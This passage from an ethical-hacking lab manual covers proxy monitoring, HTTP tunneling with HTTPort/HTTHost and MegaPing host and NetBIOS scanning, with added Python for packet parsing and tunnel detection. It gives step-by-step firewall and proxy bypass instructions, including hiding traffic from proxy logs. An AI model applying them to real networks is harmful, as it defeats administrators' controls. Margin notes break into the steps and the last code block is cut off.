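Calling relay_roundtrip(LoggingRelay(start_echo_server()), b"GET / HTTP/1.0\r\n\r\n") returns the echoed request and leaves both directions of the exchange in relay.sessions[0], the way Proxy Workbench's data pane does; with mode="refuse" the client gets nothing back and the session is marked terminated.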
25. Select On the web server, connect to port 80 in the Windows 7 virtual machine, and click OK.
[HTTP Properties dialog, General tab: "On the web server, connect to port" (selected) and "Connect via another proxy" with Proxy server and Port fields; OK / Cancel]
It allows you to 'see' how your email client communicates with the email server, how web pages are delivered to your browser and why your FTP client is not connecting to its server.
FIGURE 13.13: Configuring HTTP properties in Windows 7
26. Now check the traffic in 10.0.0.7 (Windows 7 virtual machine); the "To" column shows traffic generated from the different websites browsed in Windows Server 2008.
In the Connection Tree, if a protocol or a client/server pair is selected, the Details Pane displays the summary information of all of the socket connections that are in progress for the selected item on the Connection Tree.
FIGURE 13.14: Proxy Workbench Generated Traffic in Windows 7 Virtual Machine
Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
Tool/Utility: Proxy Workbench
Information Collected/Objectives Achieved:
■ Proxy server used: 10.0.0.7
■ Port scanned: 8080
■ Result: Traffic captured by Windows 7 virtual machine (10.0.0.7)
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Examine the Connection Failure: Termination and Refusal.
2. Evaluate how real-time logging records everything in Proxy Workbench.
Internet Connection Required
☑ Yes ☐ No
Platform Supported
☑ Classroom ☐ iLabs
HTTP Tunneling Using HTTPort
HTTPort is a program from HTTHost that makes a transparent tunnel through a proxy server or firewall.
Lab Scenario
Attackers are always on the hunt for clients that can be easily compromised, and they can enter these networks with IP spoofing to damage or steal data. The attacker can get packets through a firewall by spoofing the IP address. If attackers are able to capture network traffic, as you have learned to do in the previous lab, they can perform Trojan attacks, registry attacks, password hijacking attacks, etc., which can prove to be disastrous for an organization's network. An attacker may use a network probe to capture raw packet data and then use this raw packet data to retrieve packet information such as source and destination IP address, source and destination ports, flags, header length, checksum, Time to Live (TTL), and protocol type.
Therefore, as a network administrator you should be able to identify attacks by extracting information from captured traffic such as source and destination IP addresses, protocol type, header length, source and destination ports, etc., and compare these details with modeled attack signatures to determine whether an attack has occurred. You can also check the attack logs for the list of attacks and take evasive actions.
Also, you should be familiar with the HTTP tunneling technique, by which you can identify additional security risks that may not be readily visible from simple network and vulnerability scanning, and determine the extent to which a network IDS can identify malicious traffic within a communication channel. In this lab you will learn HTTP tunneling using HTTPort.
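As an added example (not part of the lab manual), the following Python code pulls exactly the fields the scenario lists out of a raw IPv4/TCP packet, verifies the IP header checksum, and compares the result against a small list of modeled signatures. The packet builder, the two lab-style addresses and the signature list are constructed for the demo; the signatures are illustrative scan patterns, not a real IDS rule set.

```python
"""Pull the header fields the scenario lists out of a raw IPv4/TCP packet and
compare them against simple scan signatures (added example; the packet bytes
and the signature list are constructed for the demo)."""
import struct
from ipaddress import IPv4Address

TCP_FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum over the header; 0 means a valid checksum."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:                          # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_packet(raw: bytes) -> dict:
    """Return source/destination IPs and ports, flags, header length, checksum,
    TTL and protocol, plus whether the IP header checksum verifies."""
    ver_ihl, _, total_len, _, _, ttl, proto, csum, src, dst = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    ihl = (ver_ihl & 0x0F) * 4
    info = {
        "src": str(IPv4Address(src)), "dst": str(IPv4Address(dst)),
        "header_length": ihl, "total_length": total_len, "ttl": ttl,
        "protocol": proto, "checksum": csum,
        "checksum_ok": ipv4_checksum(raw[:ihl]) == 0,
    }
    if proto == 6:                              # TCP: ports and flags follow the IP header
        sport, dport, _, _, off_flags = struct.unpack("!HHIIH", raw[ihl:ihl + 14])
        info["src_port"], info["dst_port"] = sport, dport
        info["flags"] = {n for n, bit in TCP_FLAG_BITS.items() if off_flags & bit}
    return info


def build_tcp_packet(src, dst, sport, dport, flags, ttl=64) -> bytes:
    """Constructed test input: a minimal IPv4+TCP packet with a valid IP checksum."""
    flag_bits = sum(TCP_FLAG_BITS[f] for f in flags)
    tcp = struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flag_bits, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, ttl, 6, 0,
                     IPv4Address(src).packed, IPv4Address(dst).packed)
    ip = ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:]
    return ip + tcp


# Constructed signatures in the spirit of "modeled attack signatures": every
# listed field must equal the packet's field; flags are compared as exact sets.
SIGNATURES = [
    {"name": "TCP NULL scan probe", "protocol": 6, "flags": set()},
    {"name": "TCP Xmas scan probe", "protocol": 6, "flags": {"FIN", "PSH", "URG"}},
    {"name": "SYN to FTP control port", "protocol": 6, "flags": {"SYN"}, "dst_port": 21},
]


def match_signatures(info: dict, signatures=SIGNATURES) -> list:
    """Names of every signature whose fields all equal the packet's fields."""
    return [s["name"] for s in signatures
            if all(info.get(k) == v for k, v in s.items() if k != "name")]
```

parse_packet(build_tcp_packet("10.0.0.4", "10.0.0.7", 40000, 21, {"SYN"})) yields the source and destination addresses, ports 40000 and 21, a 20-byte header, TTL 64, protocol 6, a verified checksum and the flag set {"SYN"}; match_signatures then reports the FTP control-port signature. Corrupting any header byte makes checksum_ok False, which is the first thing to check before trusting the other fields.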
Lab Objectives
This lab will show you how networks can be scanned and how to use HTTPort and HTTHost.
Lab Environment
In the lab, you need the HTTPort tool.
■ HTTPort is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort
■ You can also download the latest version of HTTPort from the link http://www.targeted.org/
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ Install HTTHost on the Windows Server 2008 virtual machine
■ Install HTTPort on the Windows Server 2012 host machine
■ Follow the wizard-driven installation steps and install it
■ Administrative privileges are required to run this tool
■ This lab might not work if the remote server filters/blocks HTTP tunneling packets
Lab Duration
Time: 20 Minutes
Overview of HTTPort
HTTPort creates a transparent tunnel through a proxy server or firewall. HTTPort allows you to use all sorts of Internet software from behind the proxy. It bypasses HTTP proxies, firewalls, and transparent accelerators.
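Since HTTPort carries tunneled sessions inside ordinary HTTP requests, the administrator's question is what such traffic looks like in a web-proxy log. The following is an added example, not part of the manual or of HTTPort: a heuristic that flags client/host pairs whose requests are frequent, almost all POST, confined to one or two URLs, and carry data in both directions. The log format, sample lines, host names and thresholds are all constructed for the demo and are not HTTPort's actual network signature.

```python
"""Heuristic spotting of HTTP tunnelling in a web-proxy log (added example).
A tunnel such as HTTPort/HTTHost carries arbitrary TCP sessions inside a stream
of ordinary-looking HTTP requests to one remote host.  In a proxy log that looks
unlike browsing: many requests per minute, nearly all POST, to one or two URLs,
with data flowing both ways.  The log format, sample lines and thresholds are
constructed for this demo, not HTTPort's real signature."""
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Constructed sample: "timestamp client method url status bytes_sent bytes_received"
SAMPLE_LOG = """\
2012-03-26T09:00:01 10.0.0.10 GET http://www.example.com/ 200 412 5120
2012-03-26T09:00:02 10.0.0.10 GET http://www.example.com/style.css 200 398 2210
2012-03-26T09:00:02 10.0.0.10 GET http://www.example.com/logo.png 200 401 9800
2012-03-26T09:00:05 10.0.0.10 GET http://www.example.com/news 200 420 7340
2012-03-26T09:00:09 10.0.0.10 POST http://www.example.com/login 302 640 310
2012-03-26T09:00:10 10.0.0.10 GET http://www.example.com/account 200 430 6100
"""
# Constructed tunnel-like burst: one POST every 5 s to the same URL for a minute.
SAMPLE_LOG += "".join(
    f"2012-03-26T09:01:{s:02d} 10.0.0.12 POST http://tunnel-host.example/ 200 1460 1460\n"
    for s in range(0, 60, 5))

WINDOW_SECONDS = 60       # sliding window for the request-rate check
MIN_REQUESTS = 8          # at least this many requests inside one window
MIN_POST_SHARE = 0.8      # share of POST requests that looks tunnel-like
MAX_DISTINCT_PATHS = 2    # browsing touches many paths; a tunnel endpoint does not


def parse_log(text):
    """Yield (time, client, method, host, path, bytes_sent, bytes_received)."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, _status, sent, received = line.split()
        u = urlsplit(url)
        yield datetime.fromisoformat(ts), client, method, u.netloc, u.path, int(sent), int(received)


def max_requests_in_window(times, window=WINDOW_SECONDS):
    """Largest number of requests whose timestamps fall within `window` seconds."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def find_tunnel_candidates(text):
    """Return {(client, host): [reasons]} for client/host pairs that look tunnelled."""
    groups = defaultdict(list)
    for rec in parse_log(text):
        groups[(rec[1], rec[3])].append(rec)
    flagged = {}
    for key, recs in groups.items():
        burst = max_requests_in_window([r[0] for r in recs])
        post_share = sum(r[2] == "POST" for r in recs) / len(recs)
        paths = {r[4] for r in recs}
        bidirectional = sum(r[5] for r in recs) > 0 and sum(r[6] for r in recs) > 0
        reasons = []
        if burst >= MIN_REQUESTS:
            reasons.append(f"{burst} requests within {WINDOW_SECONDS}s")
        if post_share >= MIN_POST_SHARE:
            reasons.append(f"{post_share:.0%} POST")
        if len(paths) <= MAX_DISTINCT_PATHS:
            reasons.append(f"only {len(paths)} distinct path(s)")
        # Require every indicator; any one alone is common in normal traffic.
        if len(reasons) == 3 and bidirectional:
            flagged[key] = reasons
    return flagged
```

find_tunnel_candidates(SAMPLE_LOG) flags only the 10.0.0.12 to tunnel-host.example pair; the browsing session to www.example.com trips none of the thresholds because it spreads a handful of mostly GET requests over many paths. Requiring all indicators together keeps a single POST-heavy form submission or a busy API client from being reported.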
Lab Tasks
Stopping IIS Services
1. Before running the tool you need to stop the IIS Admin Service and World Wide Web Publishing services on the Windows Server 2008 virtual machine.
2. Go to Administrative Privileges > Services > IIS Admin Service, right-click and click the Stop option.

HTTPort creates a transparent tunnel through a proxy server or firewall. This allows you to use all sorts of Internet software from behind the proxy.
FIGURE 14.1: Stopping IIS Admin Service in Windows Server 2008
3. Go to Administrative Privileges > Services > World Wide Web Publishing Services, right-click and click the Stop option.
It bypasses HTTPS and HTTP proxies, transparent accelerators, and firewalls. It has a built-in SOCKS4 server.
FIGURE 14.2: Stopping World Wide Web Services in Windows Server 2008
4. Open the mapped network drive "CEH-Tools" Z:\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTHost.
5. Open the HTTHost folder and double-click htthost.exe.
6. The HTTHost wizard opens; select the Options tab.
7. On the Options tab, leave all the settings at their defaults except the Personal Password field, which should be filled in with any other password. In this lab, the personal password is "magic".

It supports strong traffic encryption, which makes proxy logging useless, and supports NTLM and other authentication schemes.
8. Check the Revalidate DNS names and Log connections options and click Apply.
[HTTHost 1.8.5 Options tab. Network: Bind external to, Port 80, Personal password, Bind listening to 0.0.0.0,  Allow access from; Pass through unrecognized requests to: Host name or IP, Port, Original IP header field X-Original-IP; Timeouts; Max. local buffer; Revalidate DNS names; Log connections; Apply. Tabs: Statistics, Application log, Options, Security, Send a Gift]
FIGURE 14.3: HTTHost Options tab
9. Now leave HTTHost intact, and don't turn off the Windows Server 2008 virtual machine.
10. Now switch to the Windows Server 2012 host machine, install HTTPort from D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort, and double-click httport3snfm.exe.
11. Follow the wizard-driven installation steps.
12. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.
FIGURE 14.4: Windows Server 2012 - Desktop view
13. Click the HTTPort 3.SNFM app to open the HTTPort 3.SNFM window.
To set up HTTPort you need to point your browser to 127.0.0.1.

HTTPort comes with the predefined mapping "External HTTP proxy" of local port
FIGURE 14.5: Windows Server 2012 - Apps
14. The HTTPort 3.SNFM window appears as shown in the figure that follows.
For each application, create a custom mapping covering all the addresses it connects to. For applications that change ports dynamically there is a SOCKS4 proxy mode, in which the software creates a local SOCKS server (127.0.0.1).
[HTTPort 3.SNFM main window with tabs System, Proxy, Port mapping, About, Register. Proxy tab fields: HTTP proxy to bypass (blank = direct or firewall): Host name or IP address, Port; Proxy requires authentication: Username, Password; Bypass mode; Misc. options: User-Agent (IE 6.0); Use personal remote host at (blank = use public): Host name or IP address, Port, Password; Start button; "? <- This button helps"]
FIGURE 14.6: HTTPort Main Window
15. Select the Proxy tab and enter the host name or IP address of the targeted machine.
16. Here, as an example, enter the Windows Server 2008 virtual machine IP address, and enter port number 80.
17. You cannot set the Username and Password fields.
18. In the Use personal remote host at section, click Start and then Stop, and then enter the targeted host machine IP address and port, which should be 80.
19. Here any password could be used. As an example, enter the password as "magic".

In a real-world environment, people sometimes use a password-protected proxy to allow company employees to access the Internet.
20. Select the Port Mapping tab and click Add to create a New Mapping.
HTTHost supports registration, but it is free and password-free: you will be issued a unique ID, with which you can contact the support team and ask your questions.
21. Select the New Mapping node, right-click New Mapping, and click Edit.
[HTTPort 3.SNFM, Port mapping tab: Static TCP/IP port mappings (tunnels) tree with New mapping > Local port 0, Remote host remote.host.name, Remote port 0; "Select a mapping to see statistics"; LEDs; Built-in SOCKS4 server: Run SOCKS server (port 1080) checked, Full SOCKS4 support (BIND) available in "Remote Host" mode]
FIGURE 14.8: HTTPort creating a New Mapping
[HTTPort 3.SNFM, Proxy tab: HTTP proxy to bypass 10.0.0.4, port 80; Bypass mode: Remote host; User-Agent IE 6.0; Use personal remote host at 10.0.0.4, port 80, password filled in; Start button]
FIGURE 14.7: HTTPort Proxy settings window
[HTTPort 3.SNFM, Port mapping tab: right-click menu on New mapping offering Add, Remove and Edit]
FIGURE 14.9: HTTPort Editing to assign a mapping
22. Rename this to ftp certified hacker, select the Local port node, then right-click, click Edit and enter the port value 21.
23. Now right-click the Remote host node, click Edit and rename it as ftp.certifiedhacker.com.
24. Now right-click the Remote port node, click Edit and enter the port value 21.
[HTTPort 3.SNFM, Port mapping tab: mapping with Local port 21, Remote host ftp.certifiedhacker.com, Remote port 21; "No stats - inactive"; Run SOCKS server (port 1080) checked]
FIGURE 14.10: HTTPort Static TCP/IP port mapping
25. Click Start on the Proxy tab of HTTPort to run the HTTP tunneling.
In this kind of environment, the federated search webpart of Microsoft Search Server 2008 will not work out-of-the-box because we only support non-password protected proxy.
FIGURE 14.11: HTTPort to start tunneling
26. Now switch to the Windows Server 2008 virtual machine and click the Application log tab.
27. Check the last line; if it reads Listener listening at 0.0.0.0:80, then it is running properly.
HTTP is the basis for Web surfing, so if you can freely surf the Web from where you are, HTTPort will bring you the rest of the Internet applications.
HTTHost 1.8.5
Application log:
MAIN: HTTHOST 1.8.5 PERSONAL GIFTWARE DEMO starting
MAIN: Project codename: 99 red balloons
MAIN: Written by Dmitry Dvoinikov
MAIN: (c) 1999-2004, Dmitry Dvoinikov
MAIN: 64 total available connection(s)
MAIN: network started
MAIN: RSA keys initialized
MAIN: loading security filters...
MAIN: loaded filter "grant.dll" (allows all connections within ...
MAIN: loaded filter "block.dll" (denies all connections within ...
MAIN: done, total 2 filter(s) loaded
MAIN: using transfer encoding: PrimeScrambler64/SevenTe...
grant.dll: filters conections
block.dll: filters conections
LISTENER: listening at 0.0.0.0:80
Tabs: Statistics, Application log, Options, Security, Send a Gift
To make a data tunnel through the password-protected proxy, so that we can map an external website to a local port and federate the search result.
FIGURE 14.12: HTTHost Application log section
28. Now switch to the Windows Server 2012 host machine and turn ON the Windows Firewall.
29. Go to Windows Firewall with Advanced Security.
30. Select Outbound Rules from the left pane of the window, and then click New Rule in the right pane of the window.
FIGURE 14.13: Windows Firewall with Advanced Security window in Windows Server 2008
31. In the New Outbound Rule Wizard, select the Port option in the Rule Type section and click Next.
[New Outbound Rule Wizard, Rule Type step ("What type of rule would you like to create?"): Program (rule that controls connections for a program); Port (rule that controls connections for a TCP or UDP port), selected; Predefined (rule that controls connections for a Windows experience); Custom (custom rule). Back / Next / Cancel]
FIGURE 14.14: Windows Firewall selecting a Rule Type
Tools demonstrated in this lab are available in the Z: mapped network drive in the virtual machines.
32. Now select All remote ports in the Protocol and Ports section, and click Next.
[New Outbound Rule Wizard, Protocol and Ports step: "Does this rule apply to TCP or UDP?" TCP selected; "Does this rule apply to all remote ports or specific remote ports?" All remote ports selected; Specific remote ports (example: 80, 443, 5000-5010). Back / Next / Cancel]
HTTPort doesn't really care for the proxy as such; it works perfectly with firewalls, transparent accelerators, NATs and basically anything that lets the HTTP protocol through.
FIGURE 14.15: Windows Firewall assigning Protocols and Ports
33. In the Action section, select the Block the connection option and click Next.
[New Outbound Rule Wizard, Action step ("Specify the action to be taken when a connection matches the conditions specified in the rule"): Allow the connection (includes connections that are protected with IPsec as well as those that are not); Allow the connection if it is secure (includes only connections that have been authenticated by using IPsec; connections will be secured using the settings in IPsec properties and rules in the Connection Security Rule node); Block the connection, selected]

You need to install HTTHost on a PC that is generally accessible on the Internet, typically your "home" PC. This means that if you started a web server on the home PC, everyone else must be able to connect to it. There are two showstoppers for HTTHost on home PCs:
FIGURE 14.16: Windows Firewall setting an Action
34. In the Profile section, select all three options. The rule will apply to Domain, Private and Public; then click Next.
[New Outbound Rule Wizard, Profile step ("When does this rule apply?"): Domain (applies when a computer is connected to its corporate domain); Private (applies when a computer is connected to a private network location, such as a home or work place); Public (applies when a computer is connected to a public network location); all three checked. Back / Next / Cancel]
NAT/firewall issues: You need to enable an incoming port. For HTTHost it will typically be 80 (http) or 443 (https), but any port can be used, IF the HTTP proxy at work supports it; some proxies are configured to allow only 80 and 443.
FIGURE 14.17: Windows Firewall Profile settings
35. Type Port 21 Blocked in the Name field, and click Finish.
[New Outbound Rule Wizard, Name step: Name "Port 21 Blocked"; Description (optional). Back / Finish / Cancel]
The default TCP port for FTP connection is port 21. Sometimes the local Internet Service Provider blocks this port and this will result in FTP
FIGURE 14.18: Windows Firewall assigning a name to Port
36. The new rule Port 21 Blocked is created as shown in the following figure.
FIGURE 14.19: Windows Firewall New rule
37. Right-click the newly created rule and select Properties.
FIGURE 14.20: Windows Firewall new rule properties
38. Select the Protocols and Ports tab. Change the Remote Port option to Specific Ports and enter the port number as 21.
39. Leave the other settings at their defaults, click Apply, and then click OK.
HTTPort doesn't really care for the proxy as such: it works perfectly with firewalls, transparent accelerators, NATs and basically anything that lets the HTTP protocol through.
HTTPort then intercepts that connection and runs it through a tunnel through the proxy.
HTTPort enables you to bypass your HTTP proxy in case it blocks you from the Internet.
With HTTPort, you can use various Internet software from behind the proxy, e.g., e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC etc. The basic idea is that you set up your Internet software
40. Type ftp ftp.certifiedhacker.com in the command prompt and press Enter. The connection is blocked by the firewall on Windows Server 2008.
FIGURE 14.21: Firewall Port 21 Blocked Properties
HTTPort neither freezes nor hangs. What you are experiencing is known as "blocking operations".
FIGURE 14.22: ftp connection is blocked
41. Now open the command prompt on the Windows Server 2012 host machine, type ftp 127.0.0.1, and press Enter.
HTTPort makes it possible to open a client side of a TCP/IP connection and provide it to any software. The keywords here are: "client" and "any software".
FIGURE 14.23: Executing ftp command
Lab Analysis
Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.
Tool/Utility: HTTPort
Information Collected/Objectives Achieved:
Proxy server used: 10.0.0.4
Port scanned: 80
Result: ftp 127.0.0.1 connected to 127.0.0.1
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. How do you set up HTTPort to use an email client (Outlook, Messenger, etc.)?
2. Examine what happens if the software does not allow editing the address it connects to.
Internet Connection Required: [x] Yes [ ] No
Platform Supported: [x] Classroom [ ] iLabs
Basic Network Troubleshooting
Using MegaPing
MegaPing is an ultimate toolkit that provides complete essential utilities for information system administrators and IT solution providers.
Lab Scenario
You have learned in the previous lab that HTTP tunneling is a technique where communications within network protocols are captured using the HTTP protocol. For any company to exist on the Internet, it requires a web server. These web servers prove to be a high data value target for attackers. The attacker usually exploits the WWW server running IIS and gains command line access to the system. Once a connection has been established, the attacker uploads a precompiled version of the HTTP tunnel server (hts). With the hts server set up, the attacker then starts a client on his or her system and directs its traffic to the SRC port of the system running the hts server. This hts process listens on port 80 of the host WWW and redirects traffic. The hts process captures the traffic in HTTP headers and forwards it to the WWW server port 80, after which the attacker tries to log in to the system; once access is gained he or she sets up additional tools to further exploit the network.
MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports. In this lab you will learn to use MegaPing to check for vulnerabilities and troubleshoot issues.
Lab Objectives
This lab gives an insight into pinging to a destination address list. It teaches
how to:
■ Ping a destination address list
■ Traceroute
■ Perform NetBIOS scanning
Lab Environment
To carry out the lab, you need:
■ MegaPing, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\MegaPing
■ You can also download the latest version of MegaPing from the link http://www.magnetosoft.com/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Administrative privileges to run tools
■ TCP/IP settings correctly configured and an accessible DNS server
■ This lab will work in the CEH lab environment, on Windows Server 2012, Windows 2008, and Windows 7
Lab Duration
Time: 10 Minutes
PING stands for Packet Internet Groper.
Overview of Ping
The ping command sends Internet Control Message Protocol (ICMP) echo request packets to the target host and waits for an ICMP response. During this request-response process, ping measures the time from transmission to reception, known as the round-trip time, and records any lost packets.
Lab Tasks
TASK 1: IP Scanning
1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.
FIGURE 13.1: Windows Server 2012 - Desktop view
2. Click die MegaPing app to open die MegaPing window.
FIGURE 15.2: Windows Server 2012 - Apps
3. The MegaPing main window appears as shown in the following figure.
FIGURE 15.3: MegaPing main window
4. Select any one of the options from the left pane of the window.
5. Select IP Scanner, and type in the IP range in the From and To fields; in this lab the IP range is from 10.0.0.1 to 10.0.0.254. Click Start.
6. You can select the IP range depending on your network.
All scanners can scan individual computers, any range of IP addresses, domains, and selected types of computers inside domains.
Security Scanner provides the following information: NetBIOS names, Configuration info, open TCP and UDP ports, Transports, Shares, Users, Groups, Services, Drivers, Local Drives, Sessions, Remote Time of Date, Printers.
FIGURE 15.4: MegaPing IP Scanning
7. It will list all the IP addresses under that range with their TTL (Time to Live), Status (dead or alive), and the statistics of the dead and alive hosts.
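The Overview of Ping above describes the ICMP echo request/reply exchange, round-trip time and packet loss, and step 7 reports each address with its TTL and an alive/dead status plus totals. The Python below is an added example, not code from the lab manual or from MegaPing: it builds and checksums ICMP echo messages, measures round-trip time from a timestamp carried in the payload, and summarizes a sweep into the same Total/Active/Failed counts. The replies, addresses and TTL values are constructed; nothing is sent on the network (a real sweep needs a raw socket and administrative rights, and the TTL column of such a report comes from the IP header of the reply, not from ICMP).

```python
import struct

# ICMP message types used here (RFC 792).
ICMP_ECHO_REPLY = 0
ICMP_ECHO_REQUEST = 8


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, complemented.
    Over a whole packet whose checksum field is already filled in, the result
    is 0 when the packet is intact."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(msg_type: int, ident: int, seq: int, payload: bytes) -> bytes:
    """Echo header: type(1) code(1) checksum(2) identifier(2) sequence(2), then payload."""
    header = struct.pack("!BBHHH", msg_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", msg_type, 0, csum, ident, seq) + payload


def build_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    return build_icmp(ICMP_ECHO_REQUEST, ident, seq, payload)


def parse_echo_reply(packet):
    """Return (ident, seq, payload) for a checksum-valid echo reply, else None."""
    if packet is None or len(packet) < 8 or icmp_checksum(packet) != 0:
        return None
    msg_type, code, _csum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if msg_type != ICMP_ECHO_REPLY or code != 0:
        return None
    return ident, seq, packet[8:]


def timestamp_payload(sent_us: int) -> bytes:
    """Ping tools carry the send time in the payload; the echoed copy in the
    reply is what the round-trip time is measured against (microseconds)."""
    return struct.pack("!Q", sent_us)


def rtt_us(payload: bytes, now_us: int) -> int:
    (sent_us,) = struct.unpack("!Q", payload[:8])
    return now_us - sent_us


def summarize_sweep(observations):
    """observations: (ip, ip_header_ttl, icmp_reply_bytes_or_None) per probed address.
    A missing or corrupt reply counts as a failed host, as in the scanner's
    Total/Active/Failed statistics. TTL 64 is typical of Linux/Unix senders,
    128 of Windows senders."""
    hosts = []
    for ip, ttl, pkt in observations:
        alive = parse_echo_reply(pkt) is not None
        hosts.append((ip, ttl if alive else None, "Alive" if alive else "Dest. unreachable"))
    active = sum(1 for h in hosts if h[2] == "Alive")
    return {"total": len(hosts), "active": active, "failed": len(hosts) - active, "hosts": hosts}


def demo_sweep():
    """Constructed sample: two live hosts, one silent host, one corrupted reply."""
    req = build_echo_request(0x1234, 1, timestamp_payload(1_000_000))
    good = build_icmp(ICMP_ECHO_REPLY, 0x1234, 1, req[8:])
    corrupt = good[:-1] + bytes([good[-1] ^ 0xFF])   # flip one payload byte
    return summarize_sweep([
        ("10.0.0.1", 64, good),
        ("10.0.0.4", 128, good),
        ("10.0.0.10", None, None),
        ("10.0.0.100", 128, corrupt),
    ])


if __name__ == "__main__":
    stats = demo_sweep()
    for ip, ttl, status in stats["hosts"]:
        print(f"{ip:<12} TTL={ttl!s:<5} {status}")
    print("Total: {total}  Active: {active}  Failed: {failed}".format(**stats))
```

The checksum routine doubles as the validator: computing it over a received packet, checksum field included, yields 0 only when the packet is intact, which is why the corrupted reply in the sample is counted as failed rather than alive.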
FIGURE 15.5: MegaPing IP Scanning Report
8. Select the NetBIOS Scanner from the left pane and type in the IP range in the From and To fields. In this lab, the IP range is from 10.0.0.1 to 10.0.0.254. Click Start.
Network utilities: DNS list host, DNS lookup name, Network Time Synchronizer, Ping, Traceroute, Whois, and Finger.
TASK 2: NetBIOS Scanning
FIGURE 15.6: MegaPing NetBIOS Scanning
9. The NetBIOS scan will list all the hosts with their NetBIOS names and adapter addresses.
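The NetBIOS names and adapter addresses in step 9 come from a NetBIOS Name Service node status request (the NBSTAT record type) sent to UDP port 137 and the host's reply, as defined in RFC 1001/1002. The Python below is an added example, not MegaPing's code: it builds that request, parses a node status response into names, suffixes, group/unique flags and the adapter (MAC) address, and the reply it parses is a constructed sample with a placeholder hostname, workgroup and MAC. From the defender's side this single datagram pair per host is what a UDP/137 filter or IDS rule sees, and the reply is why exposing NetBIOS beyond the local segment leaks workgroup or domain names and hardware addresses.

```python
import struct

NBSTAT = 0x0021                          # RR type: NetBIOS node status request/response
NB_CLASS_IN = 0x0001
NB_PORT = 137                            # UDP port of the NetBIOS Name Service
WILDCARD_NAME = b"*" + b"\x00" * 15      # the name a node status request asks about

# Common name suffixes (the 16th byte of a NetBIOS name).
SUFFIXES = {0x00: "Workstation / Workgroup", 0x03: "Messenger", 0x1B: "Domain Master Browser",
            0x1D: "Master Browser", 0x1E: "Browser Elections", 0x20: "File Server"}


def nb_name(name: str, suffix: int) -> bytes:
    """16-byte NetBIOS name: upper-case, space-padded to 15, then the suffix byte."""
    return name.upper().ljust(15)[:15].encode("latin-1") + bytes([suffix])


def encode_label(raw16: bytes) -> bytes:
    """RFC 1001 first-level encoding: each byte becomes two letters 'A'..'P'
    (one per nibble), giving one 32-byte label followed by the root label."""
    enc = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw16)
    return b"\x20" + enc + b"\x00"


def build_node_status_request(txid: int) -> bytes:
    """The datagram a NetBIOS scanner sends to each host: one NBSTAT question for '*'."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_label(WILDCARD_NAME) + struct.pack("!HH", NBSTAT, NB_CLASS_IN)


def build_node_status_response(txid: int, names, mac: bytes) -> bytes:
    """Constructed reply for the demo (names: list of (name, suffix, flags)).
    RDATA = NUM_NAMES, then 18 bytes per name, then STATISTICS starting with the MAC."""
    rdata = bytes([len(names)])
    for name, suffix, flags in names:
        rdata += nb_name(name, suffix) + struct.pack("!H", flags)
    rdata += mac + b"\x00" * 40                                  # UNIT_ID + zeroed counters
    header = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)  # response, authoritative
    rr = encode_label(WILDCARD_NAME) + struct.pack("!HHIH", NBSTAT, NB_CLASS_IN, 0, len(rdata))
    return header + rr + rdata


def parse_node_status_response(pkt: bytes) -> dict:
    """Extract the name table and adapter address from a node status response."""
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a NBNS response carrying an answer")
    pos = 12
    while pkt[pos]:                                # skip the RR_NAME labels
        pos += 1 + pkt[pos]
    pos += 1
    rr_type, _cls, _ttl, _rdlen = struct.unpack("!HHIH", pkt[pos:pos + 10])
    pos += 10
    if rr_type != NBSTAT:
        raise ValueError("not a node status record")
    count, pos = pkt[pos], pos + 1
    names = []
    for _ in range(count):
        raw = pkt[pos:pos + 16]
        (fl,) = struct.unpack("!H", pkt[pos + 16:pos + 18])
        pos += 18
        names.append({
            "name": raw[:15].decode("latin-1").rstrip(" "),
            "suffix": raw[15],
            "service": SUFFIXES.get(raw[15], "unknown"),
            "group": bool(fl & 0x8000),            # G bit: group name vs unique name
            "active": bool(fl & 0x0400),           # ACT bit
        })
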